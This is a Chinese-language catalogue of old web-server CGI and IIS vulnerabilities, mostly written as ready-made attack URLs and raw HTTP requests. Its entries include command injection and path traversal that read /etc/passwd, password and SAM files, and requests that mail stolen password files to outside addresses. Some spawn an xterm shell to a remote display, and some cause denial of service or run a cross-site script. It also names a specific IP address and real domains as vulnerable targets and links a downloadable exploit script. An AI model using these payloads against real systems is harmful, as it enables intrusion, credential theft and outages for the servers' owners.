描述:在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令: http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
名字:php.cgi 2.0 beta10 或更早版本
描述:包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞读nobody权限:
http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd /etc/security/passwd等.
名字:whois_raw.cgi
描述:因为whois_raw.cgi作者的失误,这个CGI将使入侵者能够以您系统上启动httpd的用户的权限执行您系统上任意的命令:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
名字:faxsurvey
描述:在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:
http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
名字:pfdispaly.cgi
描述:在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件:
lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令:
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0a/bin/uname%20-a/'
lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0/
名字:wrap
描述:/cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件的非法访问,如:
http://www.victim.com/cgi-bin/wrap?/../../../../../etc
名字:www-sql
描述:www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件.在你的浏览器里输入"http://your.server/protected/something.html",被要求输入帐号和口令.而有www-sql就不必了:
http://your.server/cgi-bin/www-sql/protected/something.html
解决方法:
while(FCGI_Accept() >= 0)
{
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
名字:view-source
描述:在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件:
http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
名字:campas
描述:在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件:
http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a 或
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
名字:webgais
描述:/cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令:
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"line)
query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
名字:websendmail
描述:/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org〈/etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
名字:handler
描述:IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行一段程序:
telnet www.victim.com 80
GET /cgi-bin/handler/whatever;cat<tab>/etc/passwd| ?data=Download HTTP/1.0
GET /cgi-bin/handler/useless_shit;cat<tab>/etc/passwd/?data=DownloadHTTP/1.0
GET /cgi-bin/handler/blah;xwsh -display yourhost.com/?data=Download
GET /cgi-bin/handler/<tab>xterm<tab>-display〈tab>danish:0<tab>-e<tab>/bin/sh/<tab>?data=Download
注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
名字:test-cgi or nph-test-cgi
描述:http://www.victim.com/cgi-bin/test-cgi?\whatever
http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
http://www.victim.com/cgi-bin/nph-test-cgi?/*
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
名字:root or 'root
描述:对于某些BSD的apache可以:http://www.victim.com/root/etc/passwd
http://www.victim.com/'root/etc/passwd
名字:_vti_inf.html
描述: web根目录下存在_vti_inf.html文件,该文件是Frontpage extention server的特征,包含了一系列Frontpage Extention Server的重要信息;而且Frontpage Extention server是一个有很多漏洞的web服务,用它入侵者可能直接修改首页文件,如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本和它在服务器上的路径. 还有一些密码文件如:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd
名字:edit.pl
描述: /cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用户的配置情况
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
名字:htmlscript
描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使入侵者可以查看服务器上的任何文件:
http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
名字:Vulnerability in Glimpse HTTP
描述:
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80/IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo HTTP/1.0
名字:finger.cgi
描述:/cgi-bin下的finger程序,可以查看其它服务器的信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗:http://www.victim.com/cgi-bin/finger?@localhost
名字:man.sh
描述:Robert Moniot found followung. The May 1998 issue of SysAdmin Magazine contains an article, "Web-Enabled Man Pages", which includes source code for very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature.
Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page.
名字:FormHandler.cgi
描述:在表格里加上<INPUT TYPE="hidden" NAME="reply_message_attach" VALUE="text:/tmp/../etc/passwd">你的邮箱里就有/etc/passwd
名字:perl.exe
描述:在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客可以在perl.exe后面加一串指令,利用浏览器在server上执行任何脚本程序
名字:shtml.exe
描述:如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_<lt;hostname>用户和shtml.exe入侵您的机器,做您不希望的事
提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1.
名字: wwwboard.pl
描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击
名字: uploader.exe
描述: 如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件
解决方法: 对get_variables的子程序中的下面这段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替换为:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
}
名字: bdir.htr
描述: 如果您使用NT做为您的WebServer的操作系统,而且bdir.htr存在于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。
名字: webdist.cgi
描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
名字: aglimpse.cgi
描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令
名字: AT-admin.cgi
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允许普通用户完全控制整个系统
名字: webwho.pl
描述: 如果在您的Web可执行目录中有webwho.pl这个CGI脚本,那么入侵者将能利用他阅读启动Web的用户能读写执行的任何文件。
名字: w3-msql
描述: MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf()函数引起的。
名字: AnyForm.cgi
描述: 位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通过邮件传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,在server上执行任何指令.
名字: environ.cgi
描述: 在Apache web server或者IIS等其它web server的/cgi-bin/environ.cgi 程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些文件
名字: service.pwd
描述: UNix系统的http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息:
http://www.hostname.com/_vti_pvt/service.pwd
http://www.hostname.com/_vti_pvt/users.pwd
http://www.hostname.com/_vti_pvt/authors.pwd
http://www.hostname.com/_vti_pvt/administrators.pwd
名字: visadmin.exe
描述: 在OmniHTTPd Web Server的cgi-bin目录下存在这个文件visadmin.exe,那么攻击者只要输入下面的命令:
http://omni.server/cgi-bin/visadmin.exe?user=guest数分钟之后服务器的硬盘将会被撑满
名字: get32.exe
描述: Alibaba的web server,其cgi-bin目录存在get32.exe这个程序,允许入侵者任意执行一条指令:
http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
名字: alibaba.pl
描述: Alibaba的web server,其cgi-bin目录存在alibaba.pl这个程序,允许入侵者任意执行一条指令:
http://www.victim.com/cgi-bin/alibaba.pl|dir
名字: tst.bat
描述: Alibaba的web server,其cgi-bin目录存在tst.bat这个程序,允许入侵者任意执行一条指令:
http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
名字: fpcount.exe
描述: 如果您使用NT作为您的WebServer的操作平台,并只安装了SP3补丁,那么入侵者能利用这个CGI程序进行DoS攻击,使您的IIS服务拒绝访问
名字: openfile.cfm
描述: 如果在您的Web目录中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
入侵者可能能够利用它们读到您系统上的所有文件
相关连接:
http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
名字: codebrws.asp
描述: 在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路径:
http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?source=/index.asp
就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。
名字: codebrws.asp_1
描述: 在/iissamples/exair/howitworks/下面存在codebrws.asp文件,用下面的路径:
http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?source=/index.asp
就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。
名字: showcode.asp_1
描述: 在/msads/Samples/SELECTOR/目录下存在showcode.asp文件,用下面的路径:
http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
可以查到boot.ini文件的内容;实际上入侵者能够利用这个ASP查看您系统上所有启动httpd用户有权限阅读的文件
建议: 禁止对/msadc目录的匿名访问
名字: search97.vts
描述: 这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件
名字: carbo.dll
描述: 如果您安装了Systems running iCat Suite version 3.0,那么它将自动在你的系统上添加一个叫carbo.dll的文件,而入侵者将能利用这个文件访问您系统上的热和文件
名字: .html/............./config.sys
描述: 如果您使用的是较久版本的ICQ,那么入侵者能够利用它阅读您机器上的所有文件
名字: ....../
描述: 您使用的WebServer软件能使入侵者阅读您系统上的所有文件
名字: no-such-file.pl
描述: 由于您的WebServer软件的缺陷,使得入侵者能够利用不存在的CGI脚本请求来分析您的站点的目录结构
名字: _vti_bin/shtml.dll
描述: 入侵者利用这个文件将能使您的系统的CPU占用率达到100%
<a href="http://TrustedServer/_vti_bin/shtml.dll/<script>Hostile Code Here</script>">http://TrustedServer</a>如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。
使用如下格式的URL:
http://iis5server/_vti_bin/shtml.dll/<script>alert('document.domain='+document.domain)</script>
名字: nph-publish
描述: 在/cgi-bin目录下存在nph-publish文件,这使入侵者能通过www浏览服务器上的任何文件
名字:code.asp
描述:在微软提供的 ASP1.0 的例程里有一个 .asp 文件 专门用来查看其它 .asp 文件的源代码,该文件为 ASPSamp/Samples/code.asp。如果有人把这个程序上传到服务器,而服务器端没有任何防范措施的话,他就可以很容易地查看他人的程序。
例如 : code.asp?source=/directory/file.asp
http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp
最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前
名字:ism.dll
描述: 在/scripts/iisadmin/目录下存在ism.dll文件,这个文件有一个溢出错误,允许入侵者在服务器上执行任意一段程序;另外。攻击者还随时可以令服务器的www服务死掉
名字:uploadn.asp or uploadx.asp
描述: 在/scripts/tools目录下存在uploadn.asp程序,只要入侵者有一个可用帐号,哪怕是Guest帐号,就可以上传任何文件到你的web目录,除了替换主页外,他更可以进一步控制你的整个系统!
名字: newdsn.exe
描述: 这个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件,如:
http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29
&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
名字: aexp.htr or aexp2.htr or aexp3.htr or aexp4b.htr
描述: 在/iisadmpwd目录下存在aexp.htr文件,类似的还有aexp2.htr,aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破解和修改NT用户的密码。
名字: achg.htr
描述: 在/iisadmpwd目录下存在achg.htr文件,类似的还有aexp2.htr,aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破解和修改NT用户的密码。
名字: ExprCale.cfm
描述: 在Coldfusion的web目录: /cfdocs/expeval/ExprCalc.cfm文件,这个文件有个漏洞允许用户读取服务器硬盘上的任意文件包括用户密码数据库sam文件.
名字: getfile.cfm
描述: 在Coldfusion的web目录: /getfile.cfm文件,这个文件有个漏洞允许用户读取服务器硬盘上的任意文件包括用户密码数据库sam文件
名字: x.htw or qfullhit.htw or iirturnh.htw
描述: IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Index Server的点击功能的。尽管你不运行Index Server,该映射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,数据库文件,和ASP源代码。
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。
webhits.dll后接上"../"便可以访问到Web虚拟目录外的文件,下面我们来看个例子:
http://somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
在浏览器中输入该地址,便可以获得该服务器上给定日期的Web日志文件. 在系统常见的.htw样本文件有: /iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.hw
/iishelp/iis/misc/iirturnh.htw [这个文件通常受loopback限制]
利用inetinfo.exe来调用webhits.dll,这样同样能访问到Web虚拟目录外的文件,这样请求一个.htw文件:
http://url/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1
/ex000121.log&CiRestriction=none&CiHiliteType=Full
这个请求肯定会失败,但请注意,我们现在已经调用到了webhits.dll,我们只要在一个存在的文件资源后面[也就是在.htw前面]加上一串特殊的数字( %20s ),[就是在例子中default.htm后面加上这个代表空格的特殊数字],这样我们便可以欺骗过web服务器从而达到我们的目的.由于在缓冲部分中.htw文件名字部分被删除掉[由于%20s这个符号],所以,当请求传送到webhits.dll的时候,便可以成功的打开该文件,并返回给客户端,而且过程中并不要求系统中真的存在.htw文件。比如:
http://url/default.htm%20s.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1
/ex000121.log&CiRestriction=none&CiHiliteType=Full
解决方法:
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.victim.com/nosuchfile.htw
如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid
这就表示你存在这个漏洞。
这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
名字:微软开发的两个动态库存在后门允许用户查看ASP文件源程序和下载整个网站
描述:随IIS和Frontpage Extention server而来的动态库程序,存在后门,允许用户远程读取asp、asa和CGI程序的源代码。但这个动态库要求有密码,这个后门的密码是: "Netscape engineers are weenies!" 程序路径为: /_vti_bin/_vti_aut/dvwssr.dll 一般安装了 Frontpage98的 IIS服务器都有这个路径和文件。dvwssr.dll 允许远程入侵者使IIS停止响应,可以很容易向这个DLL CGI发送长缓冲器,这个缓冲器溢出能用于在远程服务器上执行任意代码。这个程序要求解码后才能发挥读取asp等源程序,有趣的是,这个密码正是嘲弄其竞争对手Netscape的。
现提供一个有该漏洞的国外网站给安全技术人员参考: http://62.236.90.195
关于读取源程序,请下载这个测试程序,
用法为: [john@Linux john]$ ./dvwssr1.pl 62.236.90.195 /cqsdoc/showcode.asp
测试程序: http://www.cnns.net/exploits/nt/dvwssr1.pl
名字:global.asa+.htr
描述:通过浏览器请求global.asa+.htr将暴露global.asa的内容,大家都知道global.asa中保存的有数据库的访问用户名和密码的.方法:http://target/global.asa+.htr 对于.ASP+.htr文件,ISM.DLL会删除其中的大部分内容,但是仍然可能泄漏一些敏感信息,例如包含文件(通常是.inc文件)的名字和路径等等。而对于global.asa文件,通常会将其全部内容显示出来,如果这个文件中包含一些重要敏感信息,例如SQL server数据库的用户名和密码,可能使攻击者更加容易地入侵或者攻击系统。
名字:Feartech ftp
描述:Feartech 的 FTP 浏览器允许你以 html 形式查看目录列表。这将十分方便地管理你的 FTP 文件。由于 FTP 浏览器没有对输入进行正确的检查使任何人能通过浏览器以 WEB server 权限查看系统的任意目录和文件。
攻击方法:http://www.server.com/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
名字:loadpage.cgi
描述:可以用来查看任意文件,首先用浏览器找到当前路径,如:http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 这时可能会返回一个错误信息:
Cannot open file /home/www/shop/XYZ
现在可以替换为下面的格式,如:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径>/<文件名>
具体如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
名字:search.cgi
描述:查看文件和执行命令,用管道命令替换数据库字段或者path/filename。
http://www.example.com/cgi-bin/search.cgi?user_id=1&database=<输入任意信息>&template=<输入任意信息>&distinct=1
采用的该系统的服务器有,可以去altavista搜索。
floralstuff.com, amazinggates.com, onlinetraders.com,
riccardosmarket.com, xstitches.com,search4u.org ,
jojomamanbebe.co.uk, armysurplus.com, cheddarbox.com,
fleamarketbooks.com, framer.com, hkmusic.com,
battenburg-lace-shirts.com, teamdawg.com , museek.net,
music123.com, candlesdelight.com, harvest.org,
robertsliardon.org, or ganicstoyou.com,classic-collectibles.com,
finestkind.net, partytimesaver.com, kkoriginals.com, blackmetal.com
名字:web_store.cgi
描述: http://example.com/cgi-bin/Web_store/web_store.cgi?page=../../../../. ./../../../etc/passwd%00.html
web_store.cgi一定判断了后缀必须为.html才能访问,否则报错!不过程序并未对文件存放的目录做检查,所以通过输入../../退到/etc目录,并通过%00.html欺骗程序,访问的是个.html文件!所以就造成了passwd文件内容暴露!
名字: Allaire ColdFusion Server
描述:通过 Allaire ColdFusion Server 4.5.1 管理员登录页可进行 D.o.S 攻击 (APP,缺陷)
涉及程序:
Allaire ColdFusion Server 4.5.1
详细:
Allaire ColdFusion 4.5.1 及之前版本在处理口令验证请求过程中存在一个致命错误,如果在管理员登录页面,例如:
http://www.xxx.com/cfide/administrator/index.cfm
输入超过40,000个字符的口令,将使 CPU 占用率达 100%,然后将拒绝所有正常的 Web 页面请求。必须重启才能继续工作.登录页面的表格会不允许输入超过40,000个字符,然而恶意用户可以下载页面到本地,修改后就可以向 ColdFusion 服务器提交超过 40,000 个字符的口令。
解决方案:
升级到 ColdFusion Server 4.6 以上
相关站点:
http://www.allaire.com/Handlers/index.cfm?ID=10954&Method=Full
推荐
评论(0条)
